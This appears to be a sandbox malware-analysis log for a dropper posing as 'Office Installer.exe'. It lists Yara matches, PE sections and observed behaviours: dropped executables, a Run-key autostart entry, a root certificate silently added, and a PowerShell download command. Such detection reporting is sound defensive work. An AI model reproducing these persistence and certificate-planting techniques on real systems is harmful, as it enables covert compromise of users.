Source: Yara match File source: 16.2.Lxfrfbi.exe.3a87008.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.72e17a8.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.4ef49f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6e41788.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.350ae90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6e41788.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6f317c8.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.31fb2c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.77f17c8.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7a90000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.350ae90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2181412356.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2248433326.0000000007751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2181412356.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2214020576.0000000005784000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2114944613.0000000004EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2181412356.0000000006F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1818612437.0000000007169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1729748988.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2248433326.0000000007701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2248433326.00000000077F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2070694207.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Source: Office Installer.exe.0.dr Static PE information: section name: .gehcont
Source: Office Installer.exe.0.dr Static PE information: section name: .00cfg
Source: Office Installer.exe.0.dr Static PE information: section name: .gxfg
Source: Office Installer.exe.0.dr Static PE information: section name: _RDATA
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_l
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_i
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_a
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_a
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_s
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_f
Source: Office Installer.exe.0.dr Static PE information: section name: .modplug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0520636B pushad ; ret 1_2_05206371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_05206F11 pushad ; ret 1_2_05206F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07D33D5E push FFFFFF8Bh; iretd 1_2_07D33D6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B9F0973 push E95B66D0h; ret 8_2_00007FFD9B9F09C9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_081B3DA9 pushad ; ret 12_2_081B3DAC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF8465 push ebx; retf 16_2_07AF8492
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07B82E5F pushfd ; retf 16_2_07B82E60
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07B80AA7 pushad ; ret 16_2_07B80AB1

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Temp\Office Installer.exe
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe File created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Vulvvmkewji.exe

Boot Survival

Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfrfbi

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
